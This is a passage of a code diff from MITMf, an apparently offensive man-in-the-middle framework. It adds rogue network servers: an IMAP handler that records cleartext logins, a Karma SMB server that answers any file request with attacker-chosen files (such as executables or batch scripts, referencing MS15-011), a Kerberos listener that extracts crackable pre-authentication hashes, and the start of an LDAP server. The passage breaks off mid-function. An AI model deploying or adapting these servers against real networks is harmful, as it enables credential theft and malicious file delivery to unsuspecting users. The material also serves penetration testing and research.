if data[5:15] == "CAPABILITY":
RequestTag = data[0:4]
self.request.send(str(IMAPCapability()))
self.request.send(str(IMAPCapabilityEnd(Tag=RequestTag)))
data = self.request.recv(1024)
if data[5:10] == "LOGIN":
Credentials = data[10:].strip()
SaveToDb({
'module': 'IMAP',
'type': 'Cleartext',
'client': self.client_address[0],
'user': Credentials[0],
'cleartext': Credentials[1],
'fullhash': Credentials[0]+":"+Credentials[1],
})
## FIXME: Close connection properly
## self.request.send(str(ditchthisconnection()))
## data = self.request.recv(1024)
except Exception:
pass

579
core/servers/KarmaSMB.py Executable file
View file

@ -0,0 +1,579 @@
#!/usr/bin/python
# Copyright (c) 2015 CORE Security Technologies
#
# This software is provided under under a slightly modified version
# of the Apache Software License. See the accompanying LICENSE file
# for more information.
#
# Karma SMB
#
# Author:
# Alberto Solino (@agsolino)
# Original idea by @mubix
#
# Description:
# The idea of this script is to answer any file read request
# with a set of predefined contents based on the extension
# asked, regardless of the sharename and/or path.
# When executing this script w/o a config file the pathname
# file contents will be sent for every request.
# If a config file is specified, format should be this way:
# <extension> = <pathname>
# for example:
# bat = /tmp/batchfile
# com = /tmp/comfile
# exe = /tmp/exefile
#
# The SMB2 support works with a caveat. If two different
# filenames at the same share are requested, the first
# one will work and the second one will not work if the request
# is performed right away. This seems related to the
# QUERY_DIRECTORY request, where we return the files available.
# In the first try, we return the file that was asked to open.
# In the second try, the client will NOT ask for another
# QUERY_DIRECTORY but will use the cached one. This time the new file
# is not there, so the client assumes it doesn't exist.
# After a few seconds, looks like the client cache is cleared and
# the operation works again. Further research is needed trying
# to avoid this from happening.
#
# SMB1 seems to be working fine on that scenario.
#
# ToDo:
# [ ] A lot of testing needed under different OSes.
# I'm still not sure how reliable this approach is.
# [ ] Add support for other SMB read commands. Right now just
# covering SMB_COM_NT_CREATE_ANDX
# [ ] Disable write request, now if the client tries to copy
# a file back to us, it will overwrite the files we're
# hosting. *CAREFUL!!!*
#
import sys
import os
import argparse
import logging
import ntpath
import ConfigParser
from threading import Thread
from mitmflib.impacket.examples import logger
from mitmflib.impacket import smbserver, smb, version
import mitmflib.impacket.smb3structs as smb2
from mitmflib.impacket.smb import FILE_OVERWRITE, FILE_OVERWRITE_IF, FILE_WRITE_DATA, FILE_APPEND_DATA, GENERIC_WRITE
from mitmflib.impacket.nt_errors import STATUS_USER_SESSION_DELETED, STATUS_SUCCESS, STATUS_ACCESS_DENIED, STATUS_NO_MORE_FILES, \
STATUS_OBJECT_PATH_NOT_FOUND
from mitmflib.impacket.smbserver import SRVSServer, decodeSMBString, findFirst2, STATUS_SMB_BAD_TID, encodeSMBString, \
getFileTime, queryPathInformation
class KarmaSMBServer(Thread):
def __init__(self, smb_challenge, smb_port, smb2Support = False):
Thread.__init__(self)
self.server = 0
self.defaultFile = None
self.extensions = {}
# Here we write a mini config for the server
smbConfig = ConfigParser.ConfigParser()
smbConfig.add_section('global')
smbConfig.set('global','server_name','server_name')
smbConfig.set('global','server_os','UNIX')
smbConfig.set('global','server_domain','WORKGROUP')
smbConfig.set('global', 'challenge', smb_challenge.decode('hex'))
smbConfig.set('global','log_file','smb.log')
smbConfig.set('global','credentials_file','')
# IPC always needed
smbConfig.add_section('IPC$')
smbConfig.set('IPC$','comment','Logon server share')
smbConfig.set('IPC$','read only','yes')
smbConfig.set('IPC$','share type','3')
smbConfig.set('IPC$','path','')
# NETLOGON always needed
smbConfig.add_section('NETLOGON')
smbConfig.set('NETLOGON','comment','Logon server share')
smbConfig.set('NETLOGON','read only','no')
smbConfig.set('NETLOGON','share type','0')
smbConfig.set('NETLOGON','path','')
# SYSVOL always needed
smbConfig.add_section('SYSVOL')
smbConfig.set('SYSVOL','comment','')
smbConfig.set('SYSVOL','read only','no')
smbConfig.set('SYSVOL','share type','0')
smbConfig.set('SYSVOL','path','')
if smb2Support:
smbConfig.set("global", "SMB2Support", "True")
self.server = smbserver.SMBSERVER(('0.0.0.0', int(smb_port)), config_parser = smbConfig)
self.server.processConfigFile()
# Unregistering some dangerous and unwanted commands
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_CREATE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE_DIRECTORY)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_RENAME)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_DELETE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE)
self.server.unregisterSmbCommand(smb.SMB.SMB_COM_WRITE_ANDX)
self.server.unregisterSmb2Command(smb2.SMB2_WRITE)
self.origsmbComNtCreateAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX, self.smbComNtCreateAndX)
self.origsmbComTreeConnectAndX = self.server.hookSmbCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX, self.smbComTreeConnectAndX)
self.origQueryPathInformation = self.server.hookTransaction2(smb.SMB.TRANS2_QUERY_PATH_INFORMATION, self.queryPathInformation)
self.origFindFirst2 = self.server.hookTransaction2(smb.SMB.TRANS2_FIND_FIRST2, self.findFirst2)
# And the same for SMB2
self.origsmb2TreeConnect = self.server.hookSmb2Command(smb2.SMB2_TREE_CONNECT, self.smb2TreeConnect)
self.origsmb2Create = self.server.hookSmb2Command(smb2.SMB2_CREATE, self.smb2Create)
self.origsmb2QueryDirectory = self.server.hookSmb2Command(smb2.SMB2_QUERY_DIRECTORY, self.smb2QueryDirectory)
self.origsmb2Read = self.server.hookSmb2Command(smb2.SMB2_READ, self.smb2Read)
self.origsmb2Close = self.server.hookSmb2Command(smb2.SMB2_CLOSE, self.smb2Close)
# Now we have to register the MS-SRVS server. This specially important for
# Windows 7+ and Mavericks clients since they WONT (specially OSX)
# ask for shares using MS-RAP.
self.__srvsServer = SRVSServer()
self.__srvsServer.daemon = True
self.server.registerNamedPipe('srvsvc',('127.0.0.1',self.__srvsServer.getListenPort()))
def findFirst2(self, connId, smbServer, recvPacket, parameters, data, maxDataCount):
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
findFirst2Parameters = smb.SMBFindFirst2_Parameters( recvPacket['Flags2'], data = parameters)
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],findFirst2Parameters['FileName']).replace('\\','/'))
origFileName = os.path.basename(origPathName)
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = connData['ConnectedShares'][recvPacket['Tid']]['path']
# 2. We call the normal findFirst2 call, but with our targetFile
searchResult, searchCount, errorCode = findFirst2(path,
targetFile,
findFirst2Parameters['InformationLevel'],
findFirst2Parameters['SearchAttributes'] )
respParameters = smb.SMBFindFirst2Response_Parameters()
endOfSearch = 1
sid = 0x80 # default SID
searchCount = 0
totalData = 0
for i in enumerate(searchResult):
#i[1].dump()
try:
# 3. And we restore the original filename requested ;)
i[1]['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = origFileName)
except:
pass
data = i[1].getData()
lenData = len(data)
if (totalData+lenData) >= maxDataCount or (i[0]+1) > findFirst2Parameters['SearchCount']:
# We gotta stop here and continue on a find_next2
endOfSearch = 0
# Simple way to generate a fid
if len(connData['SIDs']) == 0:
sid = 1
else:
sid = connData['SIDs'].keys()[-1] + 1
# Store the remaining search results in the ConnData SID
connData['SIDs'][sid] = searchResult[i[0]:]
respParameters['LastNameOffset'] = totalData
break
else:
searchCount +=1
respData += data
totalData += lenData
respParameters['SID'] = sid
respParameters['EndOfSearch'] = endOfSearch
respParameters['SearchCount'] = searchCount
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smbComNtCreateAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateAndXParameters = smb.SMBNtCreateAndX_Parameters(SMBCommand['Parameters'])
ntCreateAndXData = smb.SMBNtCreateAndX_Data( flags = recvPacket['Flags2'], data = SMBCommand['Data'])
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_CREATE_ANDX)
#ntCreateAndXParameters.dump()
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls (e.g. SMB_COM_WRITE)
createOptions = ntCreateAndXParameters['CreateOptions']
if createOptions & smb.FILE_DELETE_ON_CLOSE == smb.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE == FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['Disposition'] & smb.FILE_OVERWRITE_IF == FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_WRITE_DATA == FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.FILE_APPEND_DATA == FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & smb.GENERIC_WRITE == GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateAndXParameters['AccessMask'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [respSMBCommand], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(decodeSMBString(recvPacket['Flags2'],ntCreateAndXData['FileName']).replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
# 2. We change the filename in the request for our targetFile
ntCreateAndXData['FileName'] = encodeSMBString( flags = recvPacket['Flags2'], text = targetFile)
SMBCommand['Data'] = str(ntCreateAndXData)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
# 3. We call the original call with our modified data
return self.origsmbComNtCreateAndX(connId, smbServer, SMBCommand, recvPacket)
def queryPathInformation(self, connId, smbServer, recvPacket, parameters, data, maxDataCount = 0):
# The trick we play here is that Windows clients first ask for the file
# and then it asks for the directory containing the file.
# It is important to answer the right questions for the attack to work
connData = smbServer.getConnectionData(connId)
respSetup = ''
respParameters = ''
respData = ''
errorCode = 0
queryPathInfoParameters = smb.SMBQueryPathInformation_Parameters(flags = recvPacket['Flags2'], data = parameters)
if connData['ConnectedShares'].has_key(recvPacket['Tid']):
path = ''
try:
origPathName = decodeSMBString(recvPacket['Flags2'], queryPathInfoParameters['FileName'])
origPathName = os.path.normpath(origPathName.replace('\\','/'))
if connData.has_key('MS15011') is False:
connData['MS15011'] = {}
smbServer.log("Client is asking for QueryPathInformation for: %s" % origPathName,logging.INFO)
if connData['MS15011'].has_key(origPathName) or origPathName == '.':
# We already processed this entry, now it's asking for a directory
infoRecord, errorCode = queryPathInformation(path, '/', queryPathInfoParameters['InformationLevel'])
else:
# First time asked, asking for the file
infoRecord, errorCode = queryPathInformation(path, self.defaultFile, queryPathInfoParameters['InformationLevel'])
connData['MS15011'][os.path.dirname(origPathName)] = infoRecord
except Exception, e:
#import traceback
#traceback.print_exc()
smbServer.log("queryPathInformation: %s" % e,logging.ERROR)
if infoRecord is not None:
respParameters = smb.SMBQueryPathInformationResponse_Parameters()
respData = infoRecord
else:
errorCode = STATUS_SMB_BAD_TID
smbServer.setConnectionData(connId, connData)
return respSetup, respParameters, respData, errorCode
def smb2Read(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
connData['MS15011']['StopConnection'] = True
smbServer.setConnectionData(connId, connData)
return self.origsmb2Read(connId, smbServer, recvPacket)
def smb2Close(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
# We're closing the connection trying to flush the client's
# cache.
if connData['MS15011']['StopConnection'] is True:
return [smb2.SMB2Error()], None, STATUS_USER_SESSION_DELETED
return self.origsmb2Close(connId, smbServer, recvPacket)
def smb2Create(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
ntCreateRequest = smb2.SMB2Create(recvPacket['Data'])
# Let's try to avoid allowing write requests from the client back to us
# not 100% bulletproof, plus also the client might be using other SMB
# calls
createOptions = ntCreateRequest['CreateOptions']
if createOptions & smb2.FILE_DELETE_ON_CLOSE == smb2.FILE_DELETE_ON_CLOSE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE == smb2.FILE_OVERWRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['CreateDisposition'] & smb2.FILE_OVERWRITE_IF == smb2.FILE_OVERWRITE_IF:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_WRITE_DATA == smb2.FILE_WRITE_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.FILE_APPEND_DATA == smb2.FILE_APPEND_DATA:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & smb2.GENERIC_WRITE == smb2.GENERIC_WRITE:
errorCode = STATUS_ACCESS_DENIED
elif ntCreateRequest['DesiredAccess'] & 0x10000 == 0x10000:
errorCode = STATUS_ACCESS_DENIED
else:
errorCode = STATUS_SUCCESS
if errorCode == STATUS_ACCESS_DENIED:
return [smb2.SMB2Error()], None, errorCode
# 1. Let's grab the extension and map the file's contents we will deliver
origPathName = os.path.normpath(ntCreateRequest['Buffer'][:ntCreateRequest['NameLength']].decode('utf-16le').replace('\\','/'))
_, origPathNameExtension = os.path.splitext(origPathName)
origPathNameExtension = origPathNameExtension.upper()[1:]
# Are we being asked for a directory?
if (createOptions & smb2.FILE_DIRECTORY_FILE) == 0:
if self.extensions.has_key(origPathNameExtension.upper()):
targetFile = self.extensions[origPathNameExtension.upper()]
else:
targetFile = self.defaultFile
connData['MS15011']['FileData'] = (os.path.basename(origPathName), targetFile)
smbServer.log("%s is asking for %s. Delivering %s" % (connData['ClientIP'], origPathName,targetFile),logging.INFO)
else:
targetFile = '/'
# 2. We change the filename in the request for our targetFile
ntCreateRequest['Buffer'] = targetFile.encode('utf-16le')
ntCreateRequest['NameLength'] = len(targetFile)*2
recvPacket['Data'] = str(ntCreateRequest)
# 3. We call the original call with our modified data
return self.origsmb2Create(connId, smbServer, recvPacket)
def smb2QueryDirectory(self, connId, smbServer, recvPacket):
# Windows clients with SMB2 will also perform a QueryDirectory
# expecting to get the filename asked. So we deliver it :)
connData = smbServer.getConnectionData(connId)
respSMBCommand = smb2.SMB2QueryDirectory_Response()
#queryDirectoryRequest = smb2.SMB2QueryDirectory(recvPacket['Data'])
errorCode = 0xff
respSMBCommand['Buffer'] = '\x00'
errorCode = STATUS_SUCCESS
#if (queryDirectoryRequest['Flags'] & smb2.SL_RETURN_SINGLE_ENTRY) == 0:
# return [smb2.SMB2Error()], None, STATUS_NOT_SUPPORTED
if connData['MS15011']['FindDone'] is True:
connData['MS15011']['FindDone'] = False
smbServer.setConnectionData(connId, connData)
return [smb2.SMB2Error()], None, STATUS_NO_MORE_FILES
else:
origName, targetFile = connData['MS15011']['FileData']
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(targetFile)
infoRecord = smb.SMBFindFileIdBothDirectoryInfo( smb.SMB.FLAGS2_UNICODE )
infoRecord['ExtFileAttributes'] = smb.ATTR_NORMAL | smb.ATTR_ARCHIVE
infoRecord['EaSize'] = 0
infoRecord['EndOfFile'] = size
infoRecord['AllocationSize'] = size
infoRecord['CreationTime'] = getFileTime(ctime)
infoRecord['LastAccessTime'] = getFileTime(atime)
infoRecord['LastWriteTime'] = getFileTime(mtime)
infoRecord['LastChangeTime'] = getFileTime(mtime)
infoRecord['ShortName'] = '\x00'*24
#infoRecord['FileName'] = os.path.basename(origName).encode('utf-16le')
infoRecord['FileName'] = origName.encode('utf-16le')
padLen = (8-(len(infoRecord) % 8)) % 8
infoRecord['NextEntryOffset'] = 0
respSMBCommand['OutputBufferOffset'] = 0x48
respSMBCommand['OutputBufferLength'] = len(infoRecord.getData())
respSMBCommand['Buffer'] = infoRecord.getData() + '\xaa'*padLen
connData['MS15011']['FindDone'] = True
smbServer.setConnectionData(connId, connData)
return [respSMBCommand], None, errorCode
def smb2TreeConnect(self, connId, smbServer, recvPacket):
connData = smbServer.getConnectionData(connId)
respPacket = smb2.SMB2Packet()
respPacket['Flags'] = smb2.SMB2_FLAGS_SERVER_TO_REDIR
respPacket['Status'] = STATUS_SUCCESS
respPacket['CreditRequestResponse'] = 1
respPacket['Command'] = recvPacket['Command']
respPacket['SessionID'] = connData['Uid']
respPacket['Reserved'] = recvPacket['Reserved']
respPacket['MessageID'] = recvPacket['MessageID']
respPacket['TreeID'] = recvPacket['TreeID']
respSMBCommand = smb2.SMB2TreeConnect_Response()
treeConnectRequest = smb2.SMB2TreeConnect(recvPacket['Data'])
errorCode = STATUS_SUCCESS
## Process here the request, does the share exist?
path = str(recvPacket)[treeConnectRequest['PathOffset']:][:treeConnectRequest['PathLength']]
UNCOrShare = path.decode('utf-16le')
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
#share = searchShare(connId, path.upper(), smbServer)
connData['MS15011'] = {}
connData['MS15011']['FindDone'] = False
connData['MS15011']['StopConnection'] = False
share = {}
if share is not None:
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
respPacket['TreeID'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
else:
smbServer.log("SMB2_TREE_CONNECT not found %s" % path, logging.ERROR)
errorCode = STATUS_OBJECT_PATH_NOT_FOUND
respPacket['Status'] = errorCode
##
if path == 'IPC$':
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_PIPE
respSMBCommand['ShareFlags'] = 0x30
else:
respSMBCommand['ShareType'] = smb2.SMB2_SHARE_TYPE_DISK
respSMBCommand['ShareFlags'] = 0x0
respSMBCommand['Capabilities'] = 0
respSMBCommand['MaximalAccess'] = 0x011f01ff
respPacket['Data'] = respSMBCommand
smbServer.setConnectionData(connId, connData)
return None, [respPacket], errorCode
def smbComTreeConnectAndX(self, connId, smbServer, SMBCommand, recvPacket):
connData = smbServer.getConnectionData(connId)
resp = smb.NewSMBPacket()
resp['Flags1'] = smb.SMB.FLAGS1_REPLY
resp['Flags2'] = smb.SMB.FLAGS2_EXTENDED_SECURITY | smb.SMB.FLAGS2_NT_STATUS | smb.SMB.FLAGS2_LONG_NAMES | recvPacket['Flags2'] & smb.SMB.FLAGS2_UNICODE
resp['Tid'] = recvPacket['Tid']
resp['Mid'] = recvPacket['Mid']
resp['Pid'] = connData['Pid']
respSMBCommand = smb.SMBCommand(smb.SMB.SMB_COM_TREE_CONNECT_ANDX)
respParameters = smb.SMBTreeConnectAndXResponse_Parameters()
respData = smb.SMBTreeConnectAndXResponse_Data()
treeConnectAndXParameters = smb.SMBTreeConnectAndX_Parameters(SMBCommand['Parameters'])
if treeConnectAndXParameters['Flags'] & 0x8:
respParameters = smb.SMBTreeConnectAndXExtendedResponse_Parameters()
treeConnectAndXData = smb.SMBTreeConnectAndX_Data( flags = recvPacket['Flags2'] )
treeConnectAndXData['_PasswordLength'] = treeConnectAndXParameters['PasswordLength']
treeConnectAndXData.fromString(SMBCommand['Data'])
errorCode = STATUS_SUCCESS
UNCOrShare = decodeSMBString(recvPacket['Flags2'], treeConnectAndXData['Path'])
# Is this a UNC?
if ntpath.ismount(UNCOrShare):
path = UNCOrShare.split('\\')[3]
else:
path = ntpath.basename(UNCOrShare)
# We won't search for the share.. all of them exist :P
smbServer.log("TreeConnectAndX request for %s" % path, logging.INFO)
#share = searchShare(connId, path, smbServer)
share = {}
# Simple way to generate a Tid
if len(connData['ConnectedShares']) == 0:
tid = 1
else:
tid = connData['ConnectedShares'].keys()[-1] + 1
connData['ConnectedShares'][tid] = share
connData['ConnectedShares'][tid]['path'] = '/'
connData['ConnectedShares'][tid]['shareName'] = path
resp['Tid'] = tid
#smbServer.log("Connecting Share(%d:%s)" % (tid,path))
respParameters['OptionalSupport'] = smb.SMB.SMB_SUPPORT_SEARCH_BITS
if path == 'IPC$':
respData['Service'] = 'IPC'
else:
respData['Service'] = path
respData['PadLen'] = 0
respData['NativeFileSystem'] = encodeSMBString(recvPacket['Flags2'], 'NTFS' )
respSMBCommand['Parameters'] = respParameters
respSMBCommand['Data'] = respData
resp['Uid'] = connData['Uid']
resp.addCommand(respSMBCommand)
smbServer.setConnectionData(connId, connData)
return None, [resp], errorCode
def start(self):
self.server.serve_forever()
def setDefaultFile(self, filename):
self.defaultFile = filename
def setExtensionsConfig(self, filename):
for line in filename.readlines():
line = line.strip('\r\n ')
if line.startswith('#') is not True and len(line) > 0:
extension, pathName = line.split('=')
self.extensions[extension.strip().upper()] = os.path.normpath(pathName.strip())

204
core/servers/Kerberos.py Normal file
View file

@ -0,0 +1,204 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer, UDPServer
from core.responder.utils import *
class Kerberos:
def start(self):
try:
if OsInterfaceIsSupported():
server1 = ThreadingTCPServer((settings.Config.Bind_To, 88), KerbTCP)
server2 = ThreadingUDPServer((settings.Config.Bind_To, 88), KerbUDP)
else:
server1 = ThreadingTCPServer(('', 88), KerbTCP)
server2 = ThreadingUDPServer(('', 88), KerbUDP)
for server in [server1, server2]:
t = threading.Thread(name='Kerberos', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting Kerberos server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
class ThreadingUDPServer(ThreadingMixIn, UDPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
UDPServer.server_bind(self)
def ParseMSKerbv5TCP(Data):
MsgType = Data[21:22]
EncType = Data[43:44]
MessageType = Data[32:33]
if MsgType == "\x0a" and EncType == "\x17" and MessageType =="\x02":
if Data[49:53] == "\xa2\x36\x04\x34" or Data[49:53] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[50:51])[0]
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[153:154])[0]
Name = Data[154:154+NameLen]
DomainLen = struct.unpack('<b',Data[154+NameLen+3:154+NameLen+4])[0]
Domain = Data[154+NameLen+4:154+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if Data[44:48] == "\xa2\x36\x04\x34" or Data[44:48] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[45:46])[0]
if HashLen == 53:
Hash = Data[48:99]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[147:148])[0]
Name = Data[148:148+NameLen]
DomainLen = struct.unpack('<b',Data[148+NameLen+3:148+NameLen+4])[0]
Domain = Data[148+NameLen+4:148+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 54:
Hash = Data[53:105]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[48:100]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[148:149])[0]
Name = Data[149:149+NameLen]
DomainLen = struct.unpack('<b',Data[149+NameLen+3:149+NameLen+4])[0]
Domain = Data[149+NameLen+4:149+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
def ParseMSKerbv5UDP(Data):
MsgType = Data[17:18]
EncType = Data[39:40]
if MsgType == "\x0a" and EncType == "\x17":
if Data[40:44] == "\xa2\x36\x04\x34" or Data[40:44] == "\xa2\x35\x04\x33":
HashLen = struct.unpack('<b',Data[41:42])[0]
if HashLen == 54:
Hash = Data[44:96]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[144:145])[0]
Name = Data[145:145+NameLen]
DomainLen = struct.unpack('<b',Data[145+NameLen+3:145+NameLen+4])[0]
Domain = Data[145+NameLen+4:145+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
if HashLen == 53:
Hash = Data[44:95]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[143:144])[0]
Name = Data[144:144+NameLen]
DomainLen = struct.unpack('<b',Data[144+NameLen+3:144+NameLen+4])[0]
Domain = Data[144+NameLen+4:144+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
Hash = Data[49:101]
SwitchHash = Hash[16:]+Hash[0:16]
NameLen = struct.unpack('<b',Data[149:150])[0]
Name = Data[150:150+NameLen]
DomainLen = struct.unpack('<b',Data[150+NameLen+3:150+NameLen+4])[0]
Domain = Data[150+NameLen+4:150+NameLen+4+DomainLen]
BuildHash = "$krb5pa$23$"+Name+"$"+Domain+"$dummy$"+SwitchHash.encode('hex')
return BuildHash
else:
return False
class KerbTCP(BaseRequestHandler):
def handle(self):
try:
data = self.request.recv(1024)
KerbHash = ParseMSKerbv5TCP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise
class KerbUDP(BaseRequestHandler):
def handle(self):
try:
data, soc = self.request
KerbHash = ParseMSKerbv5UDP(data)
if KerbHash:
(n, krb, v, name, domain, d, h) = KerbHash.split('$')
SaveToDb({
'module': 'KERB',
'type': 'MSKerbv5',
'client': self.client_address[0],
'user': domain+'\\'+name,
'hash': h,
'fullhash': KerbHash,
})
except Exception:
raise

167
core/servers/LDAP.py Normal file
View file

@ -0,0 +1,167 @@
#!/usr/bin/env python
# This file is part of Responder
# Original work by Laurent Gaffie - Trustwave Holdings
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import struct
import core.responder.settings as settings
import threading
from traceback import print_exc
from SocketServer import BaseRequestHandler, ThreadingMixIn, TCPServer
from core.responder.packets import LDAPSearchDefaultPacket, LDAPSearchSupportedCapabilitiesPacket, LDAPSearchSupportedMechanismsPacket, LDAPNTLMChallenge
from core.responder.utils import *
class LDAP:
def start(self):
try:
if OsInterfaceIsSupported():
server = ThreadingTCPServer((settings.Config.Bind_To, 389), LDAPServer)
else:
server = ThreadingTCPServer(('', 389), LDAPServer)
t = threading.Thread(name='LDAP', target=server.serve_forever)
t.setDaemon(True)
t.start()
except Exception as e:
print "Error starting LDAP server: {}".format(e)
print_exc()
class ThreadingTCPServer(ThreadingMixIn, TCPServer):
allow_reuse_address = 1
def server_bind(self):
if OsInterfaceIsSupported():
try:
self.socket.setsockopt(socket.SOL_SOCKET, 25, settings.Config.Bind_To+'\0')
except:
pass
TCPServer.server_bind(self)
def ParseSearch(data):
Search1 = re.search('(objectClass)', data)
Search2 = re.search('(?i)(objectClass0*.*supportedCapabilities)', data)
Search3 = re.search('(?i)(objectClass0*.*supportedSASLMechanisms)', data)
if Search1:
return str(LDAPSearchDefaultPacket(MessageIDASNStr=data[8:9]))
if Search2:
